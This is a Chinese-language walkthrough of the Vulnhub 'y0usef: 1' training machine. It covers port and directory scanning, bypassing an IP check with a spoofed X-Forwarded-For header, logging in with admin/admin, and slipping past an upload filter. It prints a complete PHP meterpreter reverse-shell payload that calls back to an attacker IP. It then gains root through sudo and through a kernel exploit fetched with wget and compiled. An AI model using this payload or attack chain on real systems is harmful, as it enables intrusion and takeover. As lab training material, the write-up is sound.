Vulnhub Y0usef-1

admin 2024年10月10日22:07:44评论16 views字数 2824阅读9分24秒阅读模式
免责声明
由于传播、利用本公众号狐狸说安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号狐狸说安全及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉,谢谢!

0x01 靶机介绍

  • - Name: y0usef: 1

  • - Date release: 10 Dec 2020

  • - Author: y0usef

  • - Series: y0usef

  • - Description : Get two flag

  • - Difficulty : easy

靶机下载地址:
https://www.vulnhub.com/entry/y0usef-1,624/

0x02 侦察

端口探测
首先使用 nmap 进行端口扫描。
nmap -p- -sV -sC -A 192.168.0.104 -oA nmap_y0usef

Vulnhub Y0usef-1

扫描结果显示目标开放了22、80端口。
80端口
访问http://192.168.0.104提示网站正在建设中

Vulnhub Y0usef-1

目录扫描
使用 gobuster 进行目录扫描,为发现可用目录或文件
gobuster dir -u http://192.168.0.104 -w /usr/share/wordlists/dirb/big.txt -x php

Vulnhub Y0usef-1

切换大字典进行目录扫描,成功找到adminstration目录

gobuster dir -u http://192.168.0.104 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-large-words.txt

Vulnhub Y0usef-1

访问`http://192.168.0.104/adminstration`提示被拒绝

Vulnhub Y0usef-1

0x03 上线【WWW-DATA】

弱口令
利用火狐插件 ModHeader 设置请求头X-Forward-For为127.0.0.1

Vulnhub Y0usef-1

再次访问成功绕过,出现管理员登录界面

Vulnhub Y0usef-1

使用弱口令admin/admin成功登录

Vulnhub Y0usef-1

文件上传绕过
在后台中找到文件上传口,首先使用 MSF 生成木马
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.105 lport=12345 -o shell.php

木马`shell.php`内容如下:

<?php error_reporting(0); $ip = '192.168.0.105'; $port = 12345; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();?>

在本地开启监听

msfconsole -x "use exploit/multi/handler; set payload php/meterpreter/reverse_tcp; set lhost 192.168.0.105; set lport 12345; exploit -j;"

Vulnhub Y0usef-1

直接上传提示无法上传

Vulnhub Y0usef-1

修改Content-type为image/jpg后成功上传,其上传路径为files/1631375338shell.php

Vulnhub Y0usef-1

请求

http://192.168.0.104/adminstration/upload/files/1631375338shell.php

成功反弹

Vulnhub Y0usef-1

进入命令行界面,通过 Python 切换为 pty

python -c 'import pty;pty.spawn("/bin/bash")'

成功在用户家目录拿到第一个flag

Vulnhub Y0usef-1

0x04 权限提升

信息收集
对 flag 进行 base64 解码,成功拿到 SSH 登录账号和密码
echo "c3NoIDogCnVzZXIgOiB5b3VzZWYgCnBhc3MgOiB5b3VzZWYxMjM=" | base64 -d

Vulnhub Y0usef-1

SSH登录

使用以上账号密码成功登录 SSH 服务
ssh yousef@192.168.0.104

Vulnhub Y0usef-1

信息收集
查询当前用户 sudo 权限,执行管理员特权无需密码
sudo -l

Vulnhub Y0usef-1

sudo提权
配合 sudo 成功提权 root 用户
sudo su

成功在管理员家目录拿到第二个flag

cd ~cat root.txt

Vulnhub Y0usef-1

内核提权
查看内核版本为 Ubuntu 14.04
uname -acat /etc/issue

Vulnhub Y0usef-1

使用 searchsploit 根据内核版本查找可提权脚本

searchsploit linux 3.13.0

Vulnhub Y0usef-1

选择27929.c进行提权

cp /usr/share/exploitdb/exploits/linux/local/37292.c ./

在本地开启 http 服务

python -m SimpleHTTPServer 80

进入tmp目录下载 EXP 文件

wget http://192.168.0.105/37292.c

编译 EXP 并添加执行权限

gcc 37292.c -o expchmod 777 exp 

执行 EXP 成功拿到管理员权限

./expcat /root/root.txt

Vulnhub Y0usef-1

0x05 知识星球

Vulnhub Y0usef-1

原文始发于微信公众号(狐狸说安全):Vulnhub Y0usef-1

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月10日22:07:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Vulnhub Y0usef-1https://cn-sec.com/archives/1921734.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息